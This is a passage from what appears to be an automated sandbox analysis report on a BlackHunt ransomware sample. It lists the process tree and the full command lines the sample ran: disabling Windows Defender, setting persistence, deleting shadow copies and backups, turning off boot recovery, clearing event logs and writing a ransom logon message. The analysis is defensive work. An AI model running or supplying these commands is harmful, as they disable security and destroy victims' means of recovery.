2112 688 cmd.exe 108 PID 688 wrote to memory of 2112 688 cmd.exe 108 PID 1784 wrote to memory of 2596 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 109 PID 1784 wrote to memory of 2596 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 109 PID 1520 wrote to memory of 2648 1520 reg.exe 112 PID 1520 wrote to memory of 2648 1520 reg.exe 112 PID 1784 wrote to memory of 1124 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 111 PID 1784 wrote to memory of 1124 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 111 PID 2488 wrote to memory of 2688 2488 cmd.exe 110 PID 2488 wrote to memory of 2688 2488 cmd.exe 110 PID 1784 wrote to memory of 1088 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 116 PID 1784 wrote to memory of 1088 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 116 PID 3628 wrote to memory of 4836 3628 cmd.exe 174 PID 3628 wrote to memory of 4836 3628 cmd.exe 174 PID 1784 wrote to memory of 1076 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 120 PID 1784 wrote to memory of 1076 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 120 PID 2596 wrote to memory of 5088 2596 cmd.exe 175 PID 2596 wrote to memory of 5088 2596 cmd.exe 175 PID 1124 wrote to memory of 4984 1124 cmd.exe 121 PID 1124 wrote to memory of 4984 1124 cmd.exe 121 PID 1784 wrote to memory of 4396 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 123 PID 1784 wrote to memory of 4396 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 123 PID 1784 wrote to memory of 1728 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 193 PID 1784 wrote to memory of 1728 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 193 PID 1088 wrote to memory of 3900 1088 cmd.exe 201 PID 1088 wrote to memory of 3900 1088 cmd.exe 201 PID 1076 wrote to memory of 3772 1076 cmd.exe 182 PID 1076 wrote to memory of 3772 1076 cmd.exe 182 PID 1784 wrote to memory of 4744 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 128 PID 1784 wrote to memory of 4744 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 128 PID 1784 wrote to memory of 4596 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 134 PID 1784 wrote to memory of 4596 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 134 PID 4396 wrote to memory of 4512 4396 cmd.exe 133 PID 4396 wrote to memory of 4512 4396 cmd.exe 133 PID 1784 wrote to memory of 3464 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 132 PID 1784 wrote to memory of 3464 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 132 PID 1728 wrote to memory of 1660 1728 Conhost.exe 196 PID 1728 wrote to memory of 1660 1728 Conhost.exe 196 PID 1784 wrote to memory of 4724 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 135 PID 1784 wrote to memory of 4724 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 135 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe"C:\Users\Admin\AppData\Local\Temp\048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1784 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of WriteProcessMemory
PID:1728
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4596
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2380
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3392
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1016
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe" /F2⤵PID:3740
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe" /F3⤵
- Creates scheduled task(s)
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4836
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2968
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6820
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4112
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3772
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2496
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4936
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2088
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1968
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1660
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3400
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8212
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:11632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5152
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:9128
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:10852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7652
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6032
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5380
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:12088
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:11888
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:7540
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7236
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:10524
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6884
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10348
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6756
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7820
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:10244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3192
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:7036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3536
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:11356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:9140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7576
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6132
-
-
-
